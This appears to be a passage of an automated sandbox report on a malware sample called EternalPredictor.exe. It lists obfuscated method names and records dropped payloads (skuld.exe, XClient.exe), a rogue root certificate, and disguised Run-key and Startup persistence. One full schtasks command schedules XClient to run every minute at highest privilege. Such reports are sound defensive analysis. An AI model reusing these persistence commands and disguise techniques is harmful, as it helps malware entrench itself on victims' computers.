'Uqe2k6rcLSu5PX1j4tOqUiz3AsHedfpnumnQKYbU0ZFOajGepCrXgVlcsAJjGLiJ3YS24bwh0hfa1TXHx', 'fPrS3IoE8AU3qNIg9y0bwAv5b2OwoCgc90vr3Dv9sCQsynP59RPumSLyr7wt2Q86BBiUuUlWpbuS75vgr', '_1bidLvfGyo8kT6sraMlH8OWiBDlbh3JTvPbdsjQ5ks4b8uEikoXH93LqXuA3XXmZXSrsBs1I2EenFSSKB'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, 07Cdq7Slaf2T0jZczBuwyUXHac.csHigh entropy of concatenated method names: 'aNTMw6Lu16q3XeWHR1sR3PMWSc', '_85n0wGBYXzEAGGt4l8PGE0RDXu', 'CTQ4WASzc8s72DCU4qjXS0CXRl', 'Pc3Yhm8jNS8GFjGCj9zEGX6vS0', '_4SJw3T4IWGV1RB84xPDOcTwCH0BWzCDx7Cv9O75zcJBpdLzVGT2sJz', 'V7c4x1ZactwY6IDS1gx8EozmV7NQKodI3NEVUIzH9cdwub65IquqG5', 'tSoF4ErRLVczkRNY4oAHQYpg18er1hxx2JuiJvKNPus0RjONzUM9Ty', 'cReP19Usgw2ijL8SFqsFgwdEKNtvIYJq2VudLBTLJe7lL7ul2XGIKU', 'KrU1gipWTZPHUOXxkvD6LuPOmDsvj4AojcsA06vZMleEQghmaWD9sW15aZKDoJY72JOLWqRzXCo68c64eXudEf', 'w2J7OZ6KgMoKAlYfNB0Zamm0AZZpzVfIOcLbbErEWdfgG9fasIJXDTSSjeekkiQQ54pP4m3ld4E0FbrPz2HFkh'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, fHfgyTqtDDXlgFY83FcOCVN0lmCsgZzHJUE3KRMC6.csHigh entropy of concatenated method names: 'eZmacRaUJwyo2V4YVB3fpVPcLirYMs9NgnkwDjFGp', 'd85CNq0UL5V9VHkpmg49vGPNv2eivxNFlfn6SA8Wa', 'aaPTnTrt8Ym4okXALJ8ARVYV41jgbEBIV1xhS5jpX', 'TipMraploFbtSJXkrL2wl7mQA2', '_8kYnfx2Lev1BuxUf3rf6rrRChf', 'YZm91ip80fd4eMng8qFrdBzNCg', 'IVWmqzIBjqA6oT2vjG5RkSmRor', 'Pr3QotefBmeLPnEJGZAv75JZ0Z', 'UxwYolw5crzg8rmsMOEamrwCXu', 'Sy558Qu3s6mdrFllG7ujEwVbsF'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, z7GL3GcSz0bU9xxBylPHvbaUX8.csHigh entropy of concatenated method names: 'rczOseSIc2vnwuEKIR8PkcLmQa', '_04nQsc5SubxMuXJO3AjPmX0xdl', 'hFjVWq8dAgGwLNBrQoIeKlZxVQ', 'HcqlO99QRe4SHd8BzMhTs7NGM5', 'l7FpTzsY57NomzQ8RfXN2HkWPh', 'PPwLymJlD5IyaA6OX8oJLKE2eo', 'j0lPXeA3krUBU4eIKwHZCHQo8t', 'JF3URgxYwq9OQvJS00u8hCO5H8vqmWwDRbmYItsSowCm6gCXAbEsZZZmIQL', 'nwctXyVSHKGY5OLwe9fqeakonwIxFSDgOXORZzO0z6k9imOZ8ltZE3IN43d', 'yRMsRhBMjHLebAC07aypKk8Xvd0Fr7wd5MRrNJbh59gRGeUCPCNh0DRN0FX'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, pwLyC8IGS9fWPw8AOOpq13VTDw.csHigh entropy of concatenated method names: 'q75ROLrqqHV6EmJDp91TOI4VmT', 'ZtBBrD6v9t5iKcxfvJFaw3H4IuoDdY5nuT9puJXpLcjL76IDfgCpHRRBmpJVtKBkLCrPDQOodEZjpRwSz7URN3', 'vfjRU45nEBY3auUaODMgdMoHtc4K9VQz4xOTtGT5Rs8N0nXwNGPIEGNdyM7MGhG3uPvvrFFxSVofALVPdeAZNJ', 'icSHmmvwaVgso4j8Hv3S4II3minVb10MWs5SQ63NpOLDYpHqrGopkznqOvYHFNLP1M4QnYgENy3C06mTgfD2bh', 'dpGjJ3p87EOacCY2vM0V24nVRlbrIREh0oXDjE2lWXatKNNzmuZcRV5SWjWaJ4VPQdH04vzaLiesjPJ7syopT7'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, YQhejhVgT0ttgMOLyMJxgFpqD9cch4ZRZCw8NY2M6T1GDPhoPLEM2UjD1FgvZhc5VommPhvhtQvJWFL27.csHigh entropy of concatenated method names: 'v2ZikujqPLr1n6uIoVRgCl1pTavRWrBtjGZIRMgHAOgEZQHb0xl2UCVnjLOjvu4tr2gJgE8b2IxKZqqDE', 'Te60wYfmJ74mvSBCHY9Q1NYDhkeXswsJzyOxyUzGodjeG1TZQE5uz4gUMoPwHqZv0IL8rkrclqK6sLhXa', 'lOttlYb7JhxgqWLTIpZwgApjN4IiY5lALQP1k3zDtevLeLQ0arZpIFqdSuNqZ8CtJBvaQamVZPkdJjEK1', 'HklCUKPtoD7xqi5SydpzGBxTnIL1tsIxMdr9pI26Q8FfUeLJE80eMifz2MCiXpMquyZr2BP9gg7FY6Swm', 'mBYQhshBfowyxxw0DF', 'v0fl2bSQlrkwGParpN', '_0oISgafl1pHFtQOk9c', 'VFkzUzAnj429d1yALh', 'cKM0CQlApexIk8yDHx', 'wHzUyYnhv4EPtZktOH'
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.csHigh entropy of concatenated method names: 'rWgDNtD9XClx2ePX1ClUNtaUKXAVpqLIPamcaShgPjX2GXhFnNddcug1dnCUVYeOGwlDB6awhp2LkVuNJqgnwhfzwZjoQTdYyJG', 'o4DruXGjL07o2HIFSRdU1PNswHXNNiP4YoTvKJjE1DPXeiunlYhlqIeliXadQH1QXJgcgn6jIzq13184TVW4yyI4fojGlGN86m3', '_15xvhav5CsVbhcaBatgprc9bhSzTJ2Uj711MIImyF1pfHIQjLdp07HnJ6Q9SOa16zKy7DsQpO2JWsPV7aDbHYdZ9PtIwNdYGFOd', 'ilP62xKpQqTx9U2gHfS6thNHObDbYplWekVrvTfo6xzmjbv8zdAIZrapg5YqVmvuy9ANsaQ0gu716iUEjF66cZiDs1qBN0Z8sFX', '_1L4pbsWDZhKfHZBBMpDwYw8KMuVu0BHVfRoCyfa35ApP31Z07D2DM4tFjH8jSVYQ9cOiCebiaAyTg20NpIeGtPKSRB8UwLiaqJT', '_0iQVfid5km9BaIMjdJ7jvr4wgk63gqvsqAq9Cv3kDD3NTRPAeUNHUqCLeRLZcYxPwS5AFnpc0guTCN7dVAqvD7i8KE5MAiBWpEC', 'F8JSf8qjcOEGjxHWRDmywmiPNV7vP3RrfeN2DwhBNngzTla9b4eZlM2atVYZ5NqxOn9LEJk8fYy3AAZa8cNBZf5CRMGD8l0dYIO', 'WWdZkn7NhLGtutIFzAPRtfYm50evObQXhtDpar21v', 'twLqMQQuRzHiNTomU0HgBk9BDJiIXnidwc25S9R7S', 'jYqvBynZ9drCFVMYmQPpIj8VpTcr4G6PjM7ybOXXz'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, PNTkHhRdRADo9Htu8dbFVLGTwqCu2qbzjYH5zYlur5KxgSz1jQZuw8evWYvsSGwZnSHAYTXqL6hUBfvaIp2CoAMx26V.csHigh entropy of concatenated method names: '_0c5osAYdBH9XJ94w4zO6l972AlhrdGad0hqnAFgCFDwSXcziYUz2q1XXqL3Zde5p35YLYKckiT7zmCnBswlBhvyUlKO', 'zTL2B64wg2rWQWqASrnYspHnl0Z1Aumla4SUxs4D64pQI2WON1JnzP1oGkeyMwLMnb0f8QieLG4h', 'rkr0zO6T26LPtwV3U9c2u5xYBuctzMPqkJXb8TIBxlUKlPIg8rAaiHfjLP71Hzw255mMcNkH7LQq', 'Btv4maALwmARX', 'HJNgJkbLwyzIr', 'EHT5RPoBsAnvY', 'U5FhaAIW2Nj2K', '_7zTNkjNQ0QD3c', 'hQgK5oM9YmxrQ', 'LnSuQAe3DhXZ2'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, ehFF3g5JMWmvPBY7f8PHXvmxPU1QBWGhSW9HZi8z2cL2PB9AU.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'Ea65l0P6VLiuAGdcSTuvjZVcwJgbGY1253l4vMwdSVADH492dX4PnHlSS35V2YM5c6dN3ZqKdkec', 'kOmiM1AbuLNjuLBf89wLzzjhN1Q3cqGGQEB6xJwPBYbBFOr4CSGH78YstQzx2itJcGbuOsGxLZKK', 'xGK7vCJFSYRW1gcvS6EUjMnJRR8OBcSkO5EdL9avx0j551WfeEgaTLxv1eSH4wQTZWjFIcRo4bUj', 'ERiYjJBn6pFxsGNYLGgy8QzMDp73EOBHgudvczYH3MSATieVEHc6hvYTbAy3glIC6sE2LzEEvOMf'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, ZTVYtJFrmsQJQ9ljOwNBcyaFo9DitMyOY4oipU4ny.csHigh entropy of concatenated method names: 'NoCle4xZmufxswDeh5fhpTUgoSAb5eavmQrRgKskO', 'zZWCPg3bEKG534TZwNRhlqsIneV7P6FWDiwU', '_2yRRy4y5sBKarxi31GYBsSZgy2BbH10JSslb', 'f9J0BO2UoDn7uyJSkFmSMqD2U0CLAbQJIjKF', 'jF9RGodWK3s5qoVwiawclr9bGbBnIk6BZnQH'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.csHigh entropy of concatenated method names: 'k06g0iCbZCrfysspSRMUJhlvYv79m1SSzswTsLBuX8Uz3rCOToqYxOxgf2zC01crRWspIvgXQ8oEiE7TM', '_7zpgzbS6PiDyDJENNtstPc6AcDWETdl9qa8VBBfjip0JV0wNKaiUYqCSDNhWBNrFA2q5hZsTYIrwXV9eo', 'efanD038HcFIAEn81JcePjTZcmuYEb18URcxTmSvOhAn2vjbQL2CvMLKx5U8ELzWTMGmNEUgxjPFbQEUH', 'S6TBniyDwO1QE4SgIJD32eq9ggNzFjSC7eVHzx0pqJHhS5zDr1NKfdFiZ950zBN5SCgKu9PCd5pNKgRd4', '_5NB66cSsdfZl1wYpuBTFxnfbtIFkKthngYBP7aJYPI8h0KaVs8ob5oRSiwXQ0WpBTp3oQYyd9hCBeebIi', '_8auKXwrMjrWK6GETcQFbdg3Vp79uUUIPDb9Sy4WFo66QIUaj0mFhsh0uP1EDWfjJPZhOohG04ClP6EwKU', 'eZLULBsWHjkkBfq6UUkYqvjdfep7gP0Jsax6nfq8yPBu0kvptOtgeoAB89ekjARl0orRbLzx8vIrJJNzz', 'Uqe2k6rcLSu5PX1j4tOqUiz3AsHedfpnumnQKYbU0ZFOajGepCrXgVlcsAJjGLiJ3YS24bwh0hfa1TXHx', 'fPrS3IoE8AU3qNIg9y0bwAv5b2OwoCgc90vr3Dv9sCQsynP59RPumSLyr7wt2Q86BBiUuUlWpbuS75vgr', '_1bidLvfGyo8kT6sraMlH8OWiBDlbh3JTvPbdsjQ5ks4b8uEikoXH93LqXuA3XXmZXSrsBs1I2EenFSSKB'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, 07Cdq7Slaf2T0jZczBuwyUXHac.csHigh entropy of concatenated method names: 'aNTMw6Lu16q3XeWHR1sR3PMWSc', '_85n0wGBYXzEAGGt4l8PGE0RDXu', 'CTQ4WASzc8s72DCU4qjXS0CXRl', 'Pc3Yhm8jNS8GFjGCj9zEGX6vS0', '_4SJw3T4IWGV1RB84xPDOcTwCH0BWzCDx7Cv9O75zcJBpdLzVGT2sJz', 'V7c4x1ZactwY6IDS1gx8EozmV7NQKodI3NEVUIzH9cdwub65IquqG5', 'tSoF4ErRLVczkRNY4oAHQYpg18er1hxx2JuiJvKNPus0RjONzUM9Ty', 'cReP19Usgw2ijL8SFqsFgwdEKNtvIYJq2VudLBTLJe7lL7ul2XGIKU', 'KrU1gipWTZPHUOXxkvD6LuPOmDsvj4AojcsA06vZMleEQghmaWD9sW15aZKDoJY72JOLWqRzXCo68c64eXudEf', 'w2J7OZ6KgMoKAlYfNB0Zamm0AZZpzVfIOcLbbErEWdfgG9fasIJXDTSSjeekkiQQ54pP4m3ld4E0FbrPz2HFkh'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, fHfgyTqtDDXlgFY83FcOCVN0lmCsgZzHJUE3KRMC6.csHigh entropy of concatenated method names: 'eZmacRaUJwyo2V4YVB3fpVPcLirYMs9NgnkwDjFGp', 'd85CNq0UL5V9VHkpmg49vGPNv2eivxNFlfn6SA8Wa', 'aaPTnTrt8Ym4okXALJ8ARVYV41jgbEBIV1xhS5jpX', 'TipMraploFbtSJXkrL2wl7mQA2', '_8kYnfx2Lev1BuxUf3rf6rrRChf', 'YZm91ip80fd4eMng8qFrdBzNCg', 'IVWmqzIBjqA6oT2vjG5RkSmRor', 'Pr3QotefBmeLPnEJGZAv75JZ0Z', 'UxwYolw5crzg8rmsMOEamrwCXu', 'Sy558Qu3s6mdrFllG7ujEwVbsF'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, z7GL3GcSz0bU9xxBylPHvbaUX8.csHigh entropy of concatenated method names: 'rczOseSIc2vnwuEKIR8PkcLmQa', '_04nQsc5SubxMuXJO3AjPmX0xdl', 'hFjVWq8dAgGwLNBrQoIeKlZxVQ', 'HcqlO99QRe4SHd8BzMhTs7NGM5', 'l7FpTzsY57NomzQ8RfXN2HkWPh', 'PPwLymJlD5IyaA6OX8oJLKE2eo', 'j0lPXeA3krUBU4eIKwHZCHQo8t', 'JF3URgxYwq9OQvJS00u8hCO5H8vqmWwDRbmYItsSowCm6gCXAbEsZZZmIQL', 'nwctXyVSHKGY5OLwe9fqeakonwIxFSDgOXORZzO0z6k9imOZ8ltZE3IN43d', 'yRMsRhBMjHLebAC07aypKk8Xvd0Fr7wd5MRrNJbh59gRGeUCPCNh0DRN0FX'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, pwLyC8IGS9fWPw8AOOpq13VTDw.csHigh entropy of concatenated method names: 'q75ROLrqqHV6EmJDp91TOI4VmT', 'ZtBBrD6v9t5iKcxfvJFaw3H4IuoDdY5nuT9puJXpLcjL76IDfgCpHRRBmpJVtKBkLCrPDQOodEZjpRwSz7URN3', 'vfjRU45nEBY3auUaODMgdMoHtc4K9VQz4xOTtGT5Rs8N0nXwNGPIEGNdyM7MGhG3uPvvrFFxSVofALVPdeAZNJ', 'icSHmmvwaVgso4j8Hv3S4II3minVb10MWs5SQ63NpOLDYpHqrGopkznqOvYHFNLP1M4QnYgENy3C06mTgfD2bh', 'dpGjJ3p87EOacCY2vM0V24nVRlbrIREh0oXDjE2lWXatKNNzmuZcRV5SWjWaJ4VPQdH04vzaLiesjPJ7syopT7'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, YQhejhVgT0ttgMOLyMJxgFpqD9cch4ZRZCw8NY2M6T1GDPhoPLEM2UjD1FgvZhc5VommPhvhtQvJWFL27.csHigh entropy of concatenated method names: 'v2ZikujqPLr1n6uIoVRgCl1pTavRWrBtjGZIRMgHAOgEZQHb0xl2UCVnjLOjvu4tr2gJgE8b2IxKZqqDE', 'Te60wYfmJ74mvSBCHY9Q1NYDhkeXswsJzyOxyUzGodjeG1TZQE5uz4gUMoPwHqZv0IL8rkrclqK6sLhXa', 'lOttlYb7JhxgqWLTIpZwgApjN4IiY5lALQP1k3zDtevLeLQ0arZpIFqdSuNqZ8CtJBvaQamVZPkdJjEK1', 'HklCUKPtoD7xqi5SydpzGBxTnIL1tsIxMdr9pI26Q8FfUeLJE80eMifz2MCiXpMquyZr2BP9gg7FY6Swm', 'mBYQhshBfowyxxw0DF', 'v0fl2bSQlrkwGParpN', '_0oISgafl1pHFtQOk9c', 'VFkzUzAnj429d1yALh', 'cKM0CQlApexIk8yDHx', 'wHzUyYnhv4EPtZktOH'
                        Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, iQddWXbGwScqaHBkFEbMdof0OJRNz6u4WQnCKQbCS74w3fx02XLpJaDmKNJJPrSVG2hzVLqa8pl1ZFhxjBtSfLKqOzinxt5zUPR.csHigh entropy of concatenated method names: 'rWgDNtD9XClx2ePX1ClUNtaUKXAVpqLIPamcaShgPjX2GXhFnNddcug1dnCUVYeOGwlDB6awhp2LkVuNJqgnwhfzwZjoQTdYyJG', 'o4DruXGjL07o2HIFSRdU1PNswHXNNiP4YoTvKJjE1DPXeiunlYhlqIeliXadQH1QXJgcgn6jIzq13184TVW4yyI4fojGlGN86m3', '_15xvhav5CsVbhcaBatgprc9bhSzTJ2Uj711MIImyF1pfHIQjLdp07HnJ6Q9SOa16zKy7DsQpO2JWsPV7aDbHYdZ9PtIwNdYGFOd', 'ilP62xKpQqTx9U2gHfS6thNHObDbYplWekVrvTfo6xzmjbv8zdAIZrapg5YqVmvuy9ANsaQ0gu716iUEjF66cZiDs1qBN0Z8sFX', '_1L4pbsWDZhKfHZBBMpDwYw8KMuVu0BHVfRoCyfa35ApP31Z07D2DM4tFjH8jSVYQ9cOiCebiaAyTg20NpIeGtPKSRB8UwLiaqJT', '_0iQVfid5km9BaIMjdJ7jvr4wgk63gqvsqAq9Cv3kDD3NTRPAeUNHUqCLeRLZcYxPwS5AFnpc0guTCN7dVAqvD7i8KE5MAiBWpEC', 'F8JSf8qjcOEGjxHWRDmywmiPNV7vP3RrfeN2DwhBNngzTla9b4eZlM2atVYZ5NqxOn9LEJk8fYy3AAZa8cNBZf5CRMGD8l0dYIO', 'WWdZkn7NhLGtutIFzAPRtfYm50evObQXhtDpar21v', 'twLqMQQuRzHiNTomU0HgBk9BDJiIXnidwc25S9R7S', 'jYqvBynZ9drCFVMYmQPpIj8VpTcr4G6PjM7ybOXXz'

                        Persistence and Installation Behavior

                        barindex
                        Installs new ROOT certificates
                        Source: C:\Users\user\AppData\Roaming\skuld.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                        Uses cmd line tools excessively to alter registry or file data
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess created: attrib.exe
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess created: attrib.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess created: attrib.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess created: attrib.exeJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\libffi-8.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\VCRUNTIME140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\skuld.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_sqlite3.pydJump to dropped file
                        Source: C:\Users\user\Desktop\EternalPredictor.exeFile created: C:\Users\user\AppData\Roaming\skuld.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\libcrypto-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\libssl-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\rar.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\python313.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_queue.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\sqlite3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\EternalPredictor.exeFile created: C:\Users\user\AppData\Roaming\program.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\Desktop\EternalPredictor.exeFile created: C:\Users\user\AppData\Roaming\eternal.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_ssl.pydJump to dropped file

                        Boot Survival

                        barindex
                        Creates multiple autostart registry keys
                        Source: C:\Users\user\AppData\Roaming\skuld.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal ServiceJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClientJump to behavior
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\partmgrJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scrJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClientJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClientJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal ServiceJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal ServiceJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6576C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,G